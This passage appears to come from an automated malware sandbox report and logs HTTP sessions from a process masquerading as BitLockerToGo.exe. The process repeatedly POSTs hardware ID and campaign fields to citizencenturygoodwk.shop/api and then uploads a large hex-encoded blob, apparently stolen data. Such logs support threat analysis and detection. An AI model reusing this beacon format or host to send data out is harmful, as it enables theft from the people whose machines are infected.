              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tXqwJjjiHhmxF9MgylXUE0A%2F2JW7Pf%2FUEgR%2BXNgQ7lMFhyrZNedyt5R%2FLatyuuFi8xHs1dOiK3TNnYOnc9rmex6QhUCCgZXzhV415aIHmfyM%2F2oh0y2jKTY9OEl4hMp6JmpxsI4jzv68%2Fz1n"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 89e476c1fb2b8cee-EWR
              alt-svc: h3=":443"; ma=86400
              2024-07-05 04:03:12 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
              Data Ascii: eok 8.46.123.33
              2024-07-05 04:03:12 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              3192.168.2.649714188.114.96.34433800C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              TimestampBytes transferredDirectionData
              2024-07-05 04:03:13 UTC291OUTPOST /api HTTP/1.1
              Connection: Keep-Alive
              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
              Content-Length: 15109
              Host: citizencenturygoodwk.shop
              2024-07-05 04:03:13 UTC15109OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 31 36 30 31 31 45 41 44 33 42 32 37 32 39 45 43 37 30 33 30 32 30 31 39 45 36 38 32 42 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 53 45 46 59
              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"B616011EAD3B2729EC70302019E682B3--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@SEFY
              2024-07-05 04:03:13 UTC806INHTTP/1.1 200 OK
              Date: Fri, 05 Jul 2024 04:03:13 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Set-Cookie: PHPSESSID=ajhagii16jk8odimgr5imkfpt9; expires=Mon, 28-Oct-2024 21:49:52 GMT; Max-Age=9999999; path=/
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9DNGo1wclv7x8xHFjY4SK1Qef1ojau%2Bs7n565SuK0ZpBSMqbgp0gSvd1f5QLeR2m3nnhYbY%2BNjMAQ4RR1yZRICGnLp1nyBwyH9FiSb6zuOZdLv4CPKzNtavxmdH5GBj8HbM1OioogaeV6Cw3"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 89e476c8aa31c47f-EWR
              alt-svc: h3=":443"; ma=86400
              2024-07-05 04:03:13 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
              Data Ascii: eok 8.46.123.33
              2024-07-05 04:03:13 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              4192.168.2.649715188.114.96.34433800C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              TimestampBytes transferredDirectionData
              2024-07-05 04:03:14 UTC291OUTPOST /api HTTP/1.1
              Connection: Keep-Alive
              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
              Content-Length: 19967
              Host: citizencenturygoodwk.shop
              2024-07-05 04:03:14 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 31 36 30 31 31 45 41 44 33 42 32 37 32 39 45 43 37 30 33 30 32 30 31 39 45 36 38 32 42 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 53 45 46 59
              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"B616011EAD3B2729EC70302019E682B3--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@SEFY
              2024-07-05 04:03:14 UTC4636OUTData Raw: 03 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3
              Data Ascii: +?2+?2+?o?Mp5p
              2024-07-05 04:03:15 UTC808INHTTP/1.1 200 OK
              Date: Fri, 05 Jul 2024 04:03:15 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Set-Cookie: PHPSESSID=2flh24qm3himv9cn1iun41fmmj; expires=Mon, 28-Oct-2024 21:49:54 GMT; Max-Age=9999999; path=/
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hT9QESr3lPYIlBwCuizoR9r%2BL2zZSzwYQf2OnuLDzPtkrfuSRKPAItROvh6YZhWbAyrP8W7RnM9djtcWXviimFCekfHQO0a%2FnStRDHgueVxM2azgGreFGBSk9sfiTDM7ky5WXc%2F2rOT21M1J"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 89e476d0ba457277-EWR
              alt-svc: h3=":443"; ma=86400
              2024-07-05 04:03:15 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
              Data Ascii: eok 8.46.123.33
              2024-07-05 04:03:15 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              5192.168.2.649717188.114.96.34433800C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              TimestampBytes transferredDirectionData
              2024-07-05 04:03:16 UTC290OUTPOST /api HTTP/1.1
              Connection: Keep-Alive
              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
              Content-Length: 7100
              Host: citizencenturygoodwk.shop
              2024-07-05 04:03:16 UTC7100OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 31 36 30 31 31 45 41 44 33 42 32 37 32 39 45 43 37 30 33 30 32 30 31 39 45 36 38 32 42 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 53 45 46 59
              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"B616011EAD3B2729EC70302019E682B3--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@SEFY
              2024-07-05 04:03:16 UTC822INHTTP/1.1 200 OK
              Date: Fri, 05 Jul 2024 04:03:16 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Set-Cookie: PHPSESSID=q5m075tn6jk06p8kmu6fvnepko; expires=Mon, 28-Oct-2024 21:49:55 GMT; Max-Age=9999999; path=/
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wq4J5XPrwN%2Bui%2F4vTKf9oUj9xRmKlEU%2Fxqd%2BCi8iHcK0y4tQGJj6l3yw5XkX%2FjNVPlwbQqmZWusbredXFxA2o9WPiCkHwyYHEDGejB52y4a9pE%2FRBynfOll%2BhZOt3erGJ%2B%2FdyX%2FT2N5TWMrB"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 89e476dbed908c57-EWR
              alt-svc: h3=":443"; ma=86400
              2024-07-05 04:03:16 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
              Data Ascii: eok 8.46.123.33
              2024-07-05 04:03:16 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              6192.168.2.649720188.114.96.34433800C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              TimestampBytes transferredDirectionData
              2024-07-05 04:03:17 UTC290OUTPOST /api HTTP/1.1
              Connection: Keep-Alive
              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
              Content-Length: 1264
              Host: citizencenturygoodwk.shop
              2024-07-05 04:03:17 UTC1264OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 31 36 30 31 31 45 41 44 33 42 32 37 32 39 45 43 37 30 33 30 32 30 31 39 45 36 38 32 42 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 53 45 46 59
              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"B616011EAD3B2729EC70302019E682B3--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@SEFY
              2024-07-05 04:03:17 UTC806INHTTP/1.1 200 OK
              Date: Fri, 05 Jul 2024 04:03:17 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Set-Cookie: PHPSESSID=l6nctisv8tg3ookqvl7u6ol7vp; expires=Mon, 28-Oct-2024 21:49:56 GMT; Max-Age=9999999; path=/
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dW%2BGm3PZzIK6vZBTThGIjVbzwCIjJ2gELzzmMExf5tZC74sktvKnd5WtWSqPQ4dHFqOBHLhys0ApSWDAV0mUtAh6vMhunJLFTq0zO46CHRJ42SuXc3K8NogQCrTYZzg3J9VlXPGnAcR%2FcA9W"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 89e476e239a8420b-EWR
              alt-svc: h3=":443"; ma=86400
              2024-07-05 04:03:17 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
              Data Ascii: eok 8.46.123.33
              2024-07-05 04:03:17 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              7192.168.2.649722188.114.96.34433800C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              TimestampBytes transferredDirectionData
              2024-07-05 04:03:18 UTC292OUTPOST /api HTTP/1.1
              Connection: Keep-Alive
              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
              Content-Length: 584888
              Host: citizencenturygoodwk.shop
              2024-07-05 04:03:18 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 31 36 30 31 31 45 41 44 33 42 32 37 32 39 45 43 37 30 33 30 32 30 31 39 45 36 38 32 42 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 53 45 46 59
              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"B616011EAD3B2729EC70302019E682B3--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@SEFY
              2024-07-05 04:03:18 UTC15331OUTData Raw: 7c 3f 3f 38 bc 9d 23 50 2f f6 32 c6 5d ad 26 3a 38 c9 fc 66 79 ac b7 e9 88 27 e4 a2 ba 94 d3 e9 94 87 9c f2 11 cc 4c d8 fe 01 c5 d1 a9 0a a1 2e 62 ff f2 5b 8e 84 c2 7e b0 8f df fc 81 8c 86 c2 a6 68 1e a4 be a4 75 44 7a 5a 97 6d 1c 83 72 99 8e 2d 0a de 52 75 14 5a 3a ea 33 77 00 9c b3 c8 88 89 4a 99 96 7c 29 90 bd 92 74 c8 b8 e6 3a f3 99 27 1c d8 7b 2d fb d1 a5 36 f6 d0 b5 da 81 3a b5 96 1d 7b 92 db 09 43 dc 3a 21 01 ab d2 38 e1 2c e7 79 ae 3f d2 8c 4b 01 43 1d f4 44 5e d5 a7 57 aa c7 6f b9 a5 a5 4b 84 91 e5 cf 8c d5 31 4e 8a 20 cf db 27 c7 83 00 45 44 af 6b af 0f 3d 6f 41 0b 68 1c 01 01 98 fa 8d c3 34 4f 1e 30 fd 5d 13 24 2d d5 ce 47 ee b4 7f 4c 9e 81 68 9f 0d 56 2e b2 1d 5e f3 ad 94 bc 1c ae 14 0d fb 07 19 62 45 64 f9 51 a0 9a cd 41 cf a5 d5 69 97 db 89
              Data Ascii: |??8#P/2]&:8fy'L.b[~huDzZmr-RuZ:3wJ|)t:'{-6:{C:!8,y?KCD^WoK1N 'EDk=oAh4O0]$-GLhV.^bEdQAi
              2024-07-05 04:03:18 UTC15331OUTData Raw: 23 ff e6 00 97 dd 1e b5 56 ae e1 15 f7 9a 2c 6d 09 c5 f5 5b 30 74 af da 87 ee 25 44 7b 52 58 c2 9b 9a 53 39 87 6a eb 18 03 3f fa d5 e9 75 02 f6 03 1b a3 2b 1f 16 6b 55 b7 08 a8 cf 5a 9c 19 89 46 07 af 3e ac e3 c6 1a 5b bf 47 56 b7 22 0d 97 54 60 29 7e 87 95 ae 9b 7f 5b 39 bc 84 ea 14 34 ef b4 e4 41 dc 79 5e f9 eb e9 c5 e1 fc e5 ed 84 e0 99 71 8b e1 e1 2d 3e 43 01 ae 7d 9a 90 5c 9a fb ab af dc 67 42 9d e7 7b 19 08 1f 33 a0 bb d1 b7 4e 18 09 d7 b4 1d 7d 2f ab f3 cb 9f d5 54 16 58 2d dd ff f2 73 e6 9e 96 9c 75 eb 90 b6 58 6f 87 29 09 d5 9a 77 4b ec e0 3b 0f fa b6 96 ac f2 9d a5 e1 11 3e f5 43 01 ed 8e 7e ef 83 e7 7c d3 03 96 59 0d 2e 65 df 89 db 69 43 7a 1e 57 14 40 d8 7c e3 36 3f 75 8c 63 d2 5a 7e a1 7a 53 80 be 30 57 3a fc 5a 65 0d ac 64 4e 1b ed af 1e 8c
              Data Ascii: #V,m[0t%D{RXS9j?u+kUZF>[GV"T`)~[94Ay^q->C}\gB{3N}/TX-suXo)wK;>C~|Y.eiCzW@|6?ucZ~zS0W:ZedN
              2024-07-05 04:03:18 UTC15331OUTData Raw: 89 7c f0 81 58 68 a7 7a 9b f5 31 6d 07 5a 32 83 16 d5 fb e1 b6 d7 d2 f8 5b f5 c3 0d ab 6f 00 86 e3 c2 4d 22 34 ba 17 ee 3c 4e c6 ae 73 9b a2 9a ee 5e 7c 03 df f9 32 18 4a 1e 23 12 2f ca 83 0b e8 01 19 08 de 11 8f bf 29 19 db fa 8c 1c 3f eb 01 ca 35 31 e5 b7 da 34 79 c5 80 00 f4 e3 69 c9 53 50 f2 a9 17 a7 90 b4 c2 86 49 ee db a0 fc c4 83 8d 4b b4 af dc 5d 8c 9d a2 e5 0d 2b a1 2f 53 1f 28 af 92 6f fa 3b ac c7 1d b6 34 6b 7f 47 01 64 27 21 23 d3 83 15 6e 7b 6b 98 60 fa ce 55 ae 98 90 0d 70 ab 92 aa c1 d7 77 e8 25 b5 e1 ed 94 88 df ae 82 e6 c1 c4 c7 84 d0 5d ac 16 3d d2 df 93 59 90 58 f8 7f 4d 08 00 84 f3 5a 79 c1 52 95 33 bc 53 a0 64 15 58 6b d8 cd ae 4c 0a f1 32 08 b9 31 53 cd 01 92 07 c5 9a d3 f5 f0 b9 31 56 31 8d 03 63 b2 42 55 34 1d be e5 3b 8a 04 13 3a
              Data Ascii: |Xhz1mZ2[oM"4<Ns^|2J#/)?514yiSPIK]+/S(o;4kGd'!#n{k`Upw%]=YXMZyR3SdXkL21S1V1cBU4;:
              2024-07-05 04:03:18 UTC15331OUTData Raw: a1 2a a6 f8 c2 f7 de 42 7d e0 9f 46 f5 9a 41 b6 3e 26 ca ab ec fb 3b 40 6b 18 16 19 36 eb f7 db bd 32 01 09 2e fc b2 b9 27 05 6a 09 0d cd 15 97 28 22 3b d7 4e 9f 5d 3c 76 26 20 7d c9 af a7 f1 a7 43 cf 7b 16 fe 8c db 23 32 6e 51 e0 5f 3b bf ae 5d 35 5e f3 30 b2 6b c6 ff cd 71 fa 2f 02 ff 6f 8e 6c 19 24 ef 26 77 7d 17 26 ed 0a 2d c7 ca 02 05 d2 c9 54 28 79 6a 40 1e 88 6f 2c 8f b4 60 3b 21 07 ee 8d 3a cc 1b 1e 60 a6 fd d8 22 1d b4 ea f4 3c c0 e7 03 b9 e4 c5 97 f7 da 05 d8 a1 8a f4 c6 1d 96 6d 73 a6 b7 bd 9f 20 50 4e c8 bc 3d 14 ec 23 92 97 aa 1d 0a ec df fe 5a a3 a3 40 7a d7 aa 06 07 13 02 71 73 bc 7d 15 a4 8c 51 8a 49 de b8 ce 9f 54 0b 91 da 98 31 c3 2d 4a 6b 65 2e b6 1f 74 b3 32 ff f2 28 3a 74 40 a6 ac e0 4c dc 77 f7 12 8d 11 8f 79 c7 82 ba 70 0a aa 3c 48
              Data Ascii: *B}FA>&;@k62.'j(";N]<v& }C{#2nQ_;]5^0kq/ol$&w}&-T(yj@o,`;!:`"<ms PN=#Z@zqs}QIT1-Jke.t2(:t@Lwyp<H
              2024-07-05 04:03:18 UTC15331OUTData Raw: d1 8a 8b a4 f8 3d 43 8c cc 4f c5 dd 95 7e 65 48 e5 9d 89 ab 2f f7 ed 62 0b b9 8b 19 7b bc 33 f8 60 15 a3 75 29 49 cc 4f 63 08 9d 7a 78 b2 ea 47 c7 98 b0 d7 62 a1 11 6c b4 6f 6c ae b8 de 48 6d 8b 72 45 a9 fb 89 9b 72 0d 80 cb 09 21 53 7b 30 2b 13 88 97 7e 94 9b 4b 66 0a 88 eb 67 12 42 d7 a2 85 af 5e e5 8f 93 83 15 64 c6 c5 e2 69 5b 20 32 71 f3 ed c1 a6 67 d7 b0 87 d4 89 86 1e 6e e8 eb 05 b6 2e 4a 44 17 2e 86 fc 14 b4 ac b7 75 b2 e0 4a 37 1a fc ec b2 90 ca eb 89 89 e0 63 4d b0 8a e7 88 49 38 8f 45 0b 2c b0 5b 57 2c e2 dd 50 6d e4 6f 5d d4 2e 34 0e 60 0f 87 64 48 f7 8e ed 79 b0 e6 5c 6f 8c 30 3e 26 1b 3a 89 3d 47 3c 06 e7 b5 ed 90 f8 c7 fc e4 44 ee bb fa de 69 fc 8b f2 35 ec 44 49 63 f4 f2 a6 e9 69 e2 9c 4d f3 f3 58 d8 7d eb d5 27 4b 3a f8 69 d4 a2 17 dd 0d
              Data Ascii: =CO~eH/b{3`u)IOczxGblolHmrEr!S{0+~KfgB^di[ 2qgn.JD.uJ7cMI8E,[W,Pmo].4`dHy\o0>&:=G<Di5DIciMX}'K:i
              2024-07-05 04:03:18 UTC15331OUTData Raw: 95 57 cc f6 54 c1 66 67 35 45 85 6b 53 c4 92 29 62 31 5a 2e 5e 82 57 cd 28 03 39 ef 49 d3 ac 51 3f ff 95 bf 3f 36 96 8f 2a b9 3b 9e a6 6f 0e cb fd 6c 72 56 63 2f a0 f1 d7 0e 68 d2 68 a9 00 df c7 55 1c 1a 35 73 a1 1d 8a 4e ba 45 17 15 9f 48 ce fe 2e 6e e6 92 fd 8d b5 8f a1 e3 ac d0 e9 12 d9 9c 29 3a c7 f8 ed 60 89 8e 2f 47 6d 48 7b 1c e0 fd d9 46 29 47 6e b0 46 64 05 19 eb df 26 d5 f9 1c 10 44 88 8b 3b 7a b5 19 1f c9 5b 4f 7d d1 c0 ad ff 56 3e f2 24 d3 1c ba 7c 31 6f f5 6f 91 93 4e 21 d8 16 19 8e 48 aa ad ba b9 ea 71 3e e3 b5 3d 57 14 df a4 bb 6a 66 3c 9c 20 0d 8e 1c 3c 5d 95 77 66 df c8 dd 23 8f e4 57 8f ee 54 dd e1 f2 49 93 94 15 da 66 d8 18 bb be c7 97 8b bb e5 05 c2 1a e4 87 51 05 3f 7e 67 44 46 3d d1 d5 90 8f 92 60 fc b8 35 f0 43 fc 9c 4f 9a 2c af b7
              Data Ascii: WTfg5EkS)b1Z.^W(9IQ??6*;olrVc/hhU5sNEH.n):`/GmH{F)GnFd&D;z[O}V>$|1ooN!Hq>=Wjf< <]wf#WTIfQ?~gDF=`5CO,
              2024-07-05 04:03:18 UTC15331OUTData Raw: 39 df 7a af 7f db bc 3f bb 69 25 4c 59 79 fb d1 bc 48 9a f9 c2 5c a6 b7 11 f1 ac fc 1f 78 7c 92 4d 6e 81 0f 4c 60 c1 b8 21 b2 72 be c5 96 a1 44 c6 f7 43 d6 9b bb 78 9c 10 1f 9a 42 40 33 01 ce c8 43 39 f1 56 42 7f 30 1e 6f b6 3c dc de b5 96 78 45 78 21 e7 f5 da c4 5c 57 d0 b1 f3 0f 6d 77 b2 ee bf 67 3d 17 97 b5 6e 3e 22 2c 6e 07 cc 31 17 85 8d 06 c4 7c f2 37 e4 e6 c2 3d 9f a1 0c 7c f6 24 56 0a cf b8 9b a5 71 f7 fe 7b 66 f6 df 02 2c 00 97 34 18 97 2c 86 ae 73 37 52 cb 1f 13 97 34 cd a4 d7 97 2e 51 0b fd 42 86 e0 5c c7 bf 84 59 39 ce ae ba 43 cc e8 83 56 f9 d4 a7 81 f1 15 8d dc 8f 66 8b 93 48 a7 57 09 b5 b0 5d 4f d7 7e aa 3f 8f 6f 45 70 8d 6e be c9 75 e1 64 d7 a3 82 c9 59 30 c3 7f bd c8 f9 32 80 d2 5c 1b f1 fd 76 52 8b ad 10 31 70 89 fa f0 da 35 b6 ce 76 96
              Data Ascii: 9z?i%LYyH\x|MnL`!rDCxB@3C9VB0o<xEx!\Wmwg=n>",n1|7=|$Vq{f,4,s7R4.QB\Y9CVfHW]O~?oEpnudY02\vR1p5v
              2024-07-05 04:03:18 UTC15331OUTData Raw: 4a 24 a2 a0 32 01 80 61 67 d4 12 03 38 57 38 85 e9 a2 b1 6b 5a cf 94 15 a0 dd 24 73 86 b9 86 e0 f7 db 64 38 89 64 7c 70 e3 6d 85 a5 1a c3 1b b1 43 36 fe 41 f8 65 61 ba 1e 6c e7 e2 d0 85 41 fc 63 aa 0a 89 ff 41 04 b9 04 40 42 45 c4 6f b2 28 b3 23 b3 bd 65 bc 03 8f ce 63 51 11 b8 01 a8 0c fb ad c6 9e 22 f8 ea 98 89 55 90 20 17 b3 f9 0e 79 28 ab 72 1f cc fd 48 6a c8 ba 72 0b d7 21 86 a0 56 e3 0f bf 6d fa 7a 26 09 24 d3 b1 f0 c9 ba a2 8b e2 b1 57 78 ef 7f 34 69 ba 50 0d 3a 57 ab 89 80 d4 0c 7b f7 dd 35 81 db 0b c7 15 b8 9b 11 5e 2e 6d bd 9b 4b 01 c9 be 6e 7b cb 04 de c3 52 f7 93 2c cc 0f f2 1a 14 21 6f 21 01 a4 7a 93 c7 0b 99 e7 75 49 0c 3b 4f d8 88 7c 08 46 40 